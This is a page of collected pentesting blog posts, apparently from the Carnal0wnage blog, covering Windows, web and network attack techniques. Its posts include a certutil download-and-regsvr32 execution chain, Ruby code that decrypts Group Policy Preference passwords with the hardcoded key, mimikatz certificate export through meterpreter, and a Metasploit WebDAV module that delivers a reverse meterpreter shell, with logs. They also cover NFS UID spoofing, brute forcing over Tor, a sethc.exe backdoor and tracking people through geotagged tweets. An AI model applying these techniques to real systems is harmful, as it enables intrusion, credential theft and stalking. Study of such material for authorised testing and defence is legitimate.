«
Expand/Collapse
81 items tagged "Pentesting"
Related tags:
nbsp [+],
quot [+],
password [+],
tcp [+],
target [+],
host [+],
exploits [+],
xxx [+],
whitepaper [+],
vnc [+],
target machine [+],
talk [+],
ssh [+],
shell [+],
setup [+],
server [+],
rpcclient [+],
question [+],
proxying [+],
port [+],
php [+],
pentest [+],
penetration testers [+],
null [+],
nessus [+],
nbsp nbsp nbsp nbsp nbsp [+],
mobile applications [+],
mobile [+],
meterpreter [+],
hashes [+],
group [+],
google [+],
file [+],
exe [+],
domain [+],
app [+],
android [+],
aircrack [+],
zeros [+],
xd [+],
x05 [+],
x.x.x [+],
wpa psk [+],
work [+],
wordlist [+],
word [+],
windows [+],
win32 exe [+],
wget [+],
webserver setup [+],
webserver [+],
web interface [+],
web hacking [+],
web application [+],
web [+],
volume serial number [+],
vmware [+],
virtual switchboard [+],
virtual machine [+],
victim machine [+],
version [+],
van jacobson [+],
username [+],
uri [+],
typo [+],
twitter [+],
tscrack [+],
trojan w32 [+],
trojan horse [+],
trojan [+],
trapping [+],
transfer protocol ftp [+],
training [+],
traffic analysis [+],
traceroute [+],
trace details [+],
trace [+],
tool [+],
tomcat [+],
title states [+],
title [+],
timing options [+],
timing [+],
threads [+],
thomas werth [+],
thanks in advance [+],
tfe [+],
test [+],
telnet environment [+],
telnet [+],
tcp wrappers [+],
tcp connection [+],
target id [+],
target host [+],
target domain [+],
tags [+],
systemx [+],
system shell [+],
system [+],
sync [+],
switzerland [+],
suggestion [+],
subversion client [+],
subject line [+],
subdomains [+],
stiegg [+],
sticky keys [+],
sticky bit [+],
ssl vpns [+],
sqlmap [+],
sql server [+],
sql security [+],
sql [+],
speaking engagements [+],
sp3 [+],
sourceforge [+],
source address [+],
someone [+],
solution [+],
software description [+],
social engineering [+],
social engeneering [+],
smb share [+],
smb [+],
slogin [+],
simultaneous attacks [+],
sim cards [+],
sid [+],
shell session [+],
sheer folly [+],
share [+],
setup web [+],
sethc [+],
service pack 1 [+],
service [+],
server settings [+],
server message block [+],
separate page [+],
security vulnerability [+],
security team [+],
security tasks [+],
security skills [+],
security environments [+],
security [+],
secret txt [+],
sean coyne [+],
sda [+],
script logs [+],
script kiddies [+],
scope [+],
school [+],
schoenefeld [+],
saved [+],
s i [+],
ryan kazanciyan [+],
rule [+],
ruby ruby [+],
ruby [+],
root directory [+],
root account [+],
ron [+],
rob fuller [+],
risk factor [+],
request [+],
read all [+],
read [+],
rarcrack [+],
r57 [+],
qzocxoo [+],
quot quot [+],
pwned [+],
pwn [+],
pwb [+],
purpose device [+],
public options [+],
public address [+],
proxy [+],
protocol [+],
propfind [+],
proof of concept [+],
portscanning [+],
policy [+],
plug ins [+],
plug [+],
pivots [+],
pillage [+],
physical coercion [+],
php shell [+],
pdf [+],
pcap [+],
pc administrator [+],
payload [+],
path [+],
passphrase [+],
parallelism [+],
paper shredder [+],
paper [+],
pack [+],
owasp [+],
owa [+],
output [+],
oracle web [+],
oracle [+],
openvas [+],
old server [+],
office document [+],
odbc connections [+],
odbc [+],
num [+],
null sessions [+],
ntwk [+],
ntv [+],
ntds [+],
nse [+],
noobish [+],
nmap [+],
nice [+],
nfs [+],
networks [+],
network segmentation [+],
ncrack [+],
mysql [+],
mypath [+],
mydatabase [+],
msn [+],
msf [+],
ms10 [+],
mozilla firefox [+],
mnt [+],
mister x [+],
minesweeper [+],
mimikatz [+],
millennium series [+],
microsoft windows version [+],
metsvc [+],
marc schoenefeld [+],
maps [+],
mangling [+],
management [+],
malaysia [+],
macro code [+],
mac os [+],
long [+],
log [+],
local networks [+],
local network [+],
local [+],
list of usernames [+],
linux distro [+],
linux [+],
library [+],
lib [+],
lan [+],
konsole [+],
konqueror [+],
key [+],
ken [+],
juniper ssl [+],
jsp command [+],
john the ripper [+],
john [+],
joe mccray [+],
java web start [+],
java event [+],
ippersonality [+],
iplog [+],
intruder [+],
intranet address [+],
internet explorer [+],
internet [+],
internal networks [+],
interesting things [+],
interaction [+],
injection [+],
information gathering [+],
information connection [+],
information [+],
inetpub wwwroot [+],
index files [+],
http 192 168 1 1 [+],
http [+],
html [+],
hp proliant [+],
host level [+],
horse trojan [+],
honorable mention [+],
honey pots [+],
honey pot [+],
honey [+],
hidden slides [+],
hey guys [+],
hard drive [+],
hacking [+],
hack in the box [+],
group power [+],
gotchas [+],
goatee beard [+],
gle [+],
git [+],
fun [+],
ftp server [+],
ftp [+],
found [+],
folder [+],
firefox [+],
file transfer protocol [+],
fedora [+],
fast track [+],
fast [+],
external connections [+],
export share [+],
export [+],
exe binder [+],
exchange server [+],
exchange [+],
exception handler [+],
everything [+],
evasion [+],
etc passwd [+],
encrypted data [+],
encode [+],
employee directories [+],
email [+],
elite models [+],
eid [+],
don [+],
domain controller [+],
dns queries [+],
dit [+],
dirty little secrets [+],
directory domain [+],
directory [+],
digit password [+],
digit [+],
deploymentfilerepository [+],
declare [+],
dbo [+],
david kennedy [+],
database [+],
d mydatabase [+],
d clodprogressivemeshdeclaration [+],
cyber terrorism [+],
cxd [+],
cvss base [+],
curriculum [+],
current user [+],
crypto [+],
connection logs [+],
connection [+],
command shell [+],
com [+],
code fragments [+],
code [+],
cmss [+],
claudio criscione [+],
churrasco [+],
chris nickerson [+],
chris [+],
change thanks [+],
challenge [+],
case [+],
carnal0wnage [+],
capture server [+],
cain [+],
c99 [+],
c solution [+],
c logonid [+],
byval [+],
byte packets [+],
bssid [+],
bsides [+],
brute force [+],
browser default [+],
box [+],
blogspot [+],
blah blah [+],
blackhole [+],
black hat [+],
bing maps [+],
bing [+],
binder [+],
bind [+],
basename [+],
background job [+],
backdoor [+],
axd [+],
avira [+],
autopwn [+],
authors [+],
aurora [+],
attack [+],
atlanta [+],
arp poisoning [+],
apps tab [+],
apple filing [+],
anyone [+],
afp [+],
admins group [+],
administrator password [+],
administrator [+],
admin [+],
address [+],
adam [+],
acl [+],
account passwords [+],
account [+],
metasploit [+]
-
-
5:00
»
Carnal0wnage
Quick post putting together some twitter awesomeness
references:
https://twitter.com/subtee/status/888125678872399873https://twitter.com/subTee/status/888071631528235010https://twitter.com/malwaretechblog/status/733651527827623936Let's do it
1. Create your DLL
2. Base64encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down
4. Base64decode the file with certutil
5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll
-
-
5:30
»
Carnal0wnage
Geo/Social stalking is fun. Bing maps has the ability to add various "apps" to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.
Let's start with somewhere fun, like the pentagon, and see who's tweeting around there
Once you have your places picked out, you can click on the Map Apps tab.
If you click on the twitter maps app, it loads recent geo-tagged tweets
As you zoom in, you get a bit more detail
You can also follow specific users and follow them around town :-)
thanks to
indi303 for telling me about this
-CG
-
-
6:00
»
Carnal0wnage
Ron over at SkullSecurity put out a post on
Using "Git Clone" to get Pwn3DWorth a read if you havent. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.
unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].
So i posed the following to twitter
to which i got two great replies.
The first one pointed me to:
https://github.com/evilpacket/DVCS-Pillage(thanks Kos)
and the second was a shortcut to using the tool by the author (thanks Adam)
DVCS is pretty handy. With it you can pillage accessible GIT, GS and BZR repos. Similar functionality for svn already exists in
metasploit Does it work? yes mostly...an example:
user@ubuntu:~/pentest/DVCS-Pillage$ ./gitpillage.sh www.site.com/.git/Initialized empty Git repository in /home/user/pentest/DVCS-Pillage/www.site.com/.git/
Getting refs/heads/master
Getting objects/ef/72174d7a5d893XXXXXXXXXXXXXXXXXXXX
Getting index
Getting .gitignore
curl: (22) The requested URL returned error: 404
About to make 245 requests to www.site.com; This could take a while
Do you want to continue? (y/n)y
Getting objects/01/f0d130adf04d66XXXXXXXXXXXXXXXX9e4ddb41
Getting objects/49/403ecc2d8a343da9XXXXXXXXXXXXXXX3f094d9
Getting objects/d3/1195ab0e695f8b89XXXXXXXXXXXXXXXXXa3af5
Getting objects/f9/b926f07XXXXXXXXXXXXXXXXXXXX567cf438c6a
Getting objects/57/78a12e2edebXXXXXXXXXXXXXXXXXXX3f3a0e8d
---snip---
trying to checkout files
error: git checkout-index: unable to read sha1 file of wp-register.php (caad4f2b21c37bXXXXXXXXXXXXXXX81c7949ec4f74e)
#### Potentially Interesting Files ####
wp-admin/export.php - [CHECKED OUT]
wp-admin/includes/export.php - [CHECKED OUT]
wp-admin/setup-config.php - [CHECKED OUT]
wp-config-sample.php - [CHECKED OUT]
wp-config.php - [CHECKED OUT]
wp-settings.php - [CHECKED OUT]
anything useful in there?
user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information b
y
* visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'site_wordpress');
/** MySQL database username */
define('DB_USER', 'site_wp');
/** MySQL database password */
define('DB_PASSWORD', 'XXXXXXXX');
another way to turn a low to pwned :-)
-
-
6:00
»
Carnal0wnage
So i put this link out on twitter but forgot to put it on the blog.
I did a talk at the Oct 20012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.
I've run into this on a few tests where people are taking advantage of this exteremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)
So here are the slides:
Exploiting Group Policy Preferences from
chrisgates Blog post explaining the issue in detail:
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferencesMetasploit post module:
http://metasploit.com/modules/post/windows/gather/credentials/gppPowerShell module to do it:
http://obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.htmlI ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:
require 'rubygems'
require 'openssl'
require 'base64'
encrypted_data = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
def decrypt(encrypted_data)
padding = "=" * (4 - (encrypted_data.length % 4))
epassword = "#{encrypted_data}#{padding}"
decoded = Base64.decode64(epassword)
key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
aes.decrypt
aes.key = key
plaintext = aes.update(decoded)
plaintext << aes.final
pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
return pass
end
blah = decrypt(encrypted_data)
puts blah
In Action:user@ubuntu:~$ ruby gpp-decrypt-string.rbLocal*P4ssword!
-
-
7:00
»
Carnal0wnage
So we all know that mimikatz dumps hashes and passwords!!! from memory which is the shiznazzle.
But, now that its working in
memory, you can do lots more with it. Below are the various modules
"standard" ; commandes de basecrypto ; Cryptographie et certificatssekurlsa ; Dump de hashes et de mots de passes Windowssystem ; Gestion systèmeprocess ; Manipulation des processusthread ; Manipulation des threadsservice ; Manipulation des servicesprivilege ; Manipulation des privilègeswinmine ; Manipulation du démineur de Windows XP (démonstration)minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)nogpo ; Pour éviter quelques GPO trivialessamdump ; Dump de SAM offlineinject ; Injecteur de librairiests ; Manipulations Terminal Serverdivers ; Fonctions diverses trop petites pour s’émanciper
The Crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon. the crypto module helps you do this.
Things you are probably intersted in are:
crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates
to identify fun stuff that you want for your own from the host.
then crypto::exportKeys and crypto::exportCertifcates
to take that stuff home.
kinda looks like this:
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'Process 9904 created. Channel 20 created. mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */ // http://blog.gentilkiwi.com/mimikatz mimikatz(commandline) # crypto::listStoresEmplacement : 'CERT_SYSTEM_STORE_CURRENT_USER' My Root Trust CA TrustedPublisher Disallowed AuthRoot TrustedPeople ADDRESSBOOK
mimikatz(commandline) # exitexecute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- sqlapps01
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
mimikatz(commandline) # exit execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- MACHINENAME
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK
mimikatz(commandline) # exitonce exported you download the .pfx and .der files
-
-
6:00
»
Carnal0wnage
We've been able to use the
Pwn Plug on a few LARES Red Team tests.
We've mostly utilized the 3G out of band functionality, this allows us to more easily bridge that gap between physical and electronic attack. Either way its been great and definitely a value add for us.
Pwn Plug Elite gives you several methods to egress a network
http://pwnieexpress.com/pages/remote-access:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:
- SSH over any TCP port
- SSH over HTTP requests (appears as standard HTTP traffic)
- SSH over SSL (appears as HTTPS)
- SSH over DNS queries (appears as DNS traffic)
- SSH over ICMP (appears as outbound pings)
- SSH over ICMP (appears as outbound pings)
- SSH Egress Buster (top 10 common egress ports)
- Out-of-band SSH over 3G/GSM cellular (Elite models)
yak yak, lets see some action shots!
First some shots of the web interface to set up the various tunnels (taken from the web site)
Its pretty straightforward and the documentation the pwnie express guys provide will get you up and running with whatever tunnel method you choose.
ok now action shots.
Pwn Plug hanging out in an empty cube hooked up to the network
With the 3G stick plugged in. sorry kinda blurry, couldnt go back and take another ;-/
Final placement behind some boxes where it hung out for a few days.
Othere useful reading/resources
http://pwnieexpress.com/blogs/news/6156894-using-at-t-dataconnect-sim-cards-with-pwn-plug-elitehttp://pwnieexpress.com/blogs/news/6156896-using-t-mobile-4g-pay-by-the-day-with-pwn-plug-elitehttp://www.securitygeneration.com/security/pwn-plug-command-execution-using-usb-sticks/http://www.securitygeneration.com/security/reverse-ssh-over-tor-on-the-pwnie-express/http://www.securitygeneration.com/security/pwniescripts-for-pwnie-express/
-
-
6:00
»
Carnal0wnage
Metasploit comes with
dllhijacker moduleThe current module does not allow you to download exe's, in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a webdav server has been a
request for awhile, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.
So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).
The below is a "show options" with nothing set, default is to generate a EXE payload, if you want to set your own local EXE you need to set LOCALEXE to TRUE.
msf exploit(webdav_file_server) > show options
Module options (exploit/windows/dev/webdav_file_server):
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS txt yes The list of extensions to generate
LOCALEXE false yes Use a local exe instead of generating one based on payload options
LOCALFILE myexe.exe yes The filename to serve up
LOCALROOT /tmp/ yes The local file path
SHARENAME documents yes The name of the top-level share.
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on (do not change)
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI to use (do not change).
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(webdav_file_server) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_file_server) > set LHOST 192.168.26.129
LHOST => 192.168.26.129
smsf exploit(webdav_file_server) > set LPORT 5555
LPORT => 5555
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17904 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17904 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17904 PROPFIND /documents
[*] 192.168.26.1:17904 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17904 PROPFIND /documents/
[*] 192.168.26.1:17904 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17904 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17904 GET => Delivering Generated EXE Payload
**Manually execute the exe**
[*] Sending stage (752128 bytes) to 192.168.26.1
[*] Meterpreter session 1 opened (192.168.26.129:5555 -> 192.168.26.1:17800) at Thu May 17 23:13:29 -0700 2012
Now if you want to serve a local exe
msf exploit(webdav_file_server) > jobs -K
Stopping all jobs...
[*] Server stopped.
msf exploit(webdav_file_server) > set LOCALEXE TRUE
LOCALEXE => TRUE
msf exploit(webdav_file_server) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.
msf exploit(webdav_file_server) > [*] 192.168.26.1:17870 OPTIONS /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents/myexe.exe
[*] 192.168.26.1:17870 PROPFIND => 207 File (/documents/myexe.exe)
[*] 192.168.26.1:17870 PROPFIND /documents
[*] 192.168.26.1:17870 PROPFIND => 301 (/documents)
[*] 192.168.26.1:17870 PROPFIND /documents/
[*] 192.168.26.1:17870 PROPFIND => 207 Directory (/documents/)
[*] 192.168.26.1:17870 PROPFIND => 207 Top-Level Directory
[*] 192.168.26.1:17870 GET => Delivering Local EXE Payload [ /tmp/myexe.exe ]
I've tested this on windows 7 and windows XP and I've been told this works with IE7 and below but not IE8. I've just been executing it on the command line.
Usage*:
copy \\ip\documents\myexe.exe myexe.exe
You may have to net use first
net use \\ip\documents\ /User:Guest
You'll see windows attempt the request of SMB, fail, then switch to doing the WebDAV thing.
Once the bin is on the box you can exec the bin manually.
*there are a couple of other ways to run this, the guy that asked me to help with all this will have a post on it soon.
code is
HERE in the github repo, be gentle i dont usually do exploit code...
-CG
-
-
8:44
»
Carnal0wnage
Quick post on timing options with Burp Intruder.
Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at it to quickly. That sux.
I regularly use Intruder to do my brute forcing for me, specially since you can add timing options.
You can intercept your request, send to intruder, then add a payload marker for the username (and password if you want to do username/username)
Setting the payload spots
So if you just want to iterate through a list of usernames with the same pass, you just set the pass then go to payloads and add your userlist. Above, I'm doing username and username as the password and using the pitchfork attack type. ( I think Ken has gone over this
in depth, so i'll stop explaining all that unless people ask for it).
Our list of usernames
Once that is set up, you can play with timing options from the options tab. This will adjust number of threads and how long to wait in between requests.
Timing options
You may also want to send everything through tor. Check the Burp main options tab.
-CG
-
-
5:30
»
Carnal0wnage
Post [12] Trace.axd
"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application’s root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit=”[n]” in the application’s configuration file."
http://www.ucertify.com/article/what-is-traceaxd.htmlIt is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information—the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd.
http://www.dotnetperls.com/traceLOW? Actually a Medium.
What can I do with it?
- Read ALL variables and data from HTTP requests
- POST requests rock! ?
Discovery?
Metasploit
Example
Main trace.axd page
Viewing a request
Post request with creds
-CG
-
-
5:00
»
Carnal0wnage
Post [11] Honorable Mention: Open NFS
Open NFS mounts/shares are awesome. talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions. so checking to see whats shared and what you can access is important.
Low? currently an "info" with Nessus 5
Anyway, you probably want to know about finding it. You have a few options.
standard portscanning (of course)
1. scan for port 111/2049
2. do showmount -e / showmount -a
3. metasploit module
example:
root@attacker]# showmount -e 192.168.0.1
Export list for 192.168.0.1:
/export/home/ (everyone)
/export/mnt/ (everyone)
/export/share/ (everyone)
3. look to see what's exported and who is mounting ("everyone" FTW)
To mount an NFS share use the following after first creating a directory on your local machine:
[root@attacker~]#mount -t nfs 192.168.0.1:/export/home /tmp/badperms
change directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1
to abuse NFS you can check out the rest from
http://www.vulnerabilityassessment.co.uk/nfs.htm it talks about tricking NFS to become users. I'm going to put it here in case it goes missing later:
"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.
If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.
-rwxr----- 517 wheel 898 daves_secret_doc
The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.
Move away from the mount point and unmount the share
umount /local_dir
create a user called dave
useradd dave
passwd dave
Edit /etc/passwd and change the UID to 517
Remount the share as local root
Go into daves directory
cd dave
issue the command
su dave
As you are local root you can do this and as you have an account called dave you will not need a password
Now the quirky stuff - As the UID for your local account dave matches the username and UID of the remote, the remote system now thinks your his dave, hey presto you can now do whatever you want with daves_secret_doc."
NfSpy is supposed to assist with the above:
https://github.com/bonsaiviking/NfSpynmap scripts to do additional info gathering
nfs-lsnfs-showmountnfs-statfsValsmith and hdmoore gave their tactical exploitation talk at defcon 15 and talked about NFS (file services section of the
slides)
video white paper they also gave it at blackhat in a much longer format, unfortunately the video is broken into multiple 14 minute parts, so go Google for it (lazy)
Fun Reading:
Swiss Cyber Storm II Case: NFS Hacking:
http://www.csnc.ch/misc/files/publications/2009_scsII_axel_neumann_NFS.pdf
-
-
5:00
»
Carnal0wnage
Post [10] Honorable Mention: FCKeditor
FCKeditor is bundled with seems-like everything (ColdFusion, Drupal plugins, WordPress plugins, other random CMSs) and has probably been responsible for countless hacks via file upload issues.
Examples:
http://www.exploit-db.com/exploits/12697/http://www.exploit-db.com/exploits/15484/http://www.exploit-db.com/exploits/17644/Big O'l list on Exploit-DBCVEdetails on FCKeditor.
LOW?
Actually most FCKeditors checks in Nessus I found were either Medium or High (hence honorable mention and not in the talk).
There is a good write-up of a classic case of FCKEditor abuse here:
http://secureyes.net/nw/assets/File-Upload-Vulnerability-in-FCKEditor.pdfGoogle Dorks
inurl:/editor/filemanager/browser/default/connectors/[LANGUAGE]/connector.php
-
-
5:00
»
Carnal0wnage
-
-
5:00
»
Carnal0wnage
Post [8] Honorable Mention: Log File Injection
So this didn't make it into the talk, but was in the hidden slides...
not positive this is a "low" but a friend suggested it, so here you go.
Goes like this:
Request gets logged
Something malicious gets written commonly something like a one line PHP backdoor
- 1. Use an LFI vulnerability to browse to page get shell
- Example 1: Php Shell Injection On A Website Through Log Poisoning http://www.securitytube.net/video/167
- Rails 3.0.5 Log File Injection http://packetstormsecurity.org/files/99282/Rails-3.0.5-Log-File-Injection-Proof-Of-Concept.html
- http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
- Example 2: BURP SUITE - PART IV: LFI EXPLOIT via LOG INJECTION http://kaoticcreations.blogspot.com/2011/12/burp-suite-part-iv-lfi-exploit-via-log_20.html
- 2. Wait for an admin to view logs and do whatever you did (XSS)
- Example 1: http://xforce.iss.net/xforce/xfdb/50170
- Example 2: http://www.securityfocus.com/archive/1/464471
Can also do fun stuff like this (TNS Logfile injection in Oracle)
-
-
5:00
»
Carnal0wnage
Post [7] HTTP PUT/WebDAV/SEARCH
Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.
LOW?
IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....
The "game" is finding the writable directory (if one exists) on the WebDAV enabled server.
*Dirbusting and ruby FTW*
I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.
Once you have a directory you want to test you can use
cadaver to manually test,
davtest, or
Ryan Linn's metasploit module for testing for WebDAV.
I've also done some posts on webDAV in the past
http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.htmlhttp://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.htmlhdm had done a post on it in the past in relation to the asp payload, i cant find it on the R7 site but its mirrored here:
http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.htmlDecent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdfHTTP PUTHTTP PUT/SEARCH usually gets rolled into
Web scanners are better about alerting on PUT as an available method and most will attempt the PUT for you. I don't think any vuln scanners do, i'm sure someone will correct me if i'm wrong.
Writable HTTP PUT is rare (least for me) although some friends say they see it all the time.
metasploit has a module to test for PUT functionality as well.
http://www.metasploit.com/modules/auxiliary/scanner/http/http_putHTTP SEARCHHTTP SEARCH can be fun. When enabled, will give you a listing of every file in the webroot.
Mubix did a post on it
http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html
-
-
5:00
»
Carnal0wnage
Post [6] SharePoint
Misconfigured SharePoint can be *really* useful. Examples of things you can do with it are:
- User/Domain Enumeration
- Access to useful files
Regular / Auth Protected SharePoint also gives you a point to conduct brute-force attacks against AD or SharePoint users.
We regularly find awesome stuff once we have access to SharePoint. Its not uncommon to find service account passwords, alarm information, employee directories, all kinds of useful stuff.
LOW?
Finding SharePoint serversrandom targets...lots of interesting things can be found with google dorks.
If you need to look at specific servers:
Stach and Liu's has released their SharePoint Diggity tools
http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/ you can also roll your own
http://code.google.com/p/fuzzdb/source/browse/trunk/Discovery/PredictableRes/Sharepoint.fuzz.txt
Examples of open access
If you have credentials you can use web services calls to pull information from AD, from:
http://blog.mindedsecurity.com/2011/07/athcon-2011-presentation.html
Stuff to read:http://www.mindedsecurity.com/fileshare/Fedon_Athcon_June11.pdfhttp://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29
-
-
5:00
»
Carnal0wnage
Post [5] Honorable Mention: Null Sessions
Null sessions are old school. they used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.
Where they can come in useful is
- Against mis-configured servers
- Against domain controllers to pull info
Low? actually a medium...
More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using
rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.
If you like pretty pictures, it kinda looks like this, there are command line utilities as well...
Cain uses null sessions by default to try to pull information. On modern systems this will fail.
But domain controllers/
master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can a list of users for the domain
You can then take that list of users and do brute force attacks against various services. I rarely don't find at least one username/username in an environment.
-
-
9:10
»
Carnal0wnage
This has been documented all over, but i like things to be on the blog so i can find them...
You can gain a SYSTEM shell on an application you have administrative access on or if you have physical access to the box and can boot to repair disk or linux distro and can change files.
make a copy somewhere of the original on system sethc.exe
copy c:\windows\system32\sethc.exe c:\
cp /mnt/sda3/Windows/System32/sethc.exe /mnt/sda3/sethc.exe
copy cmd.exe into sethc.exe's place
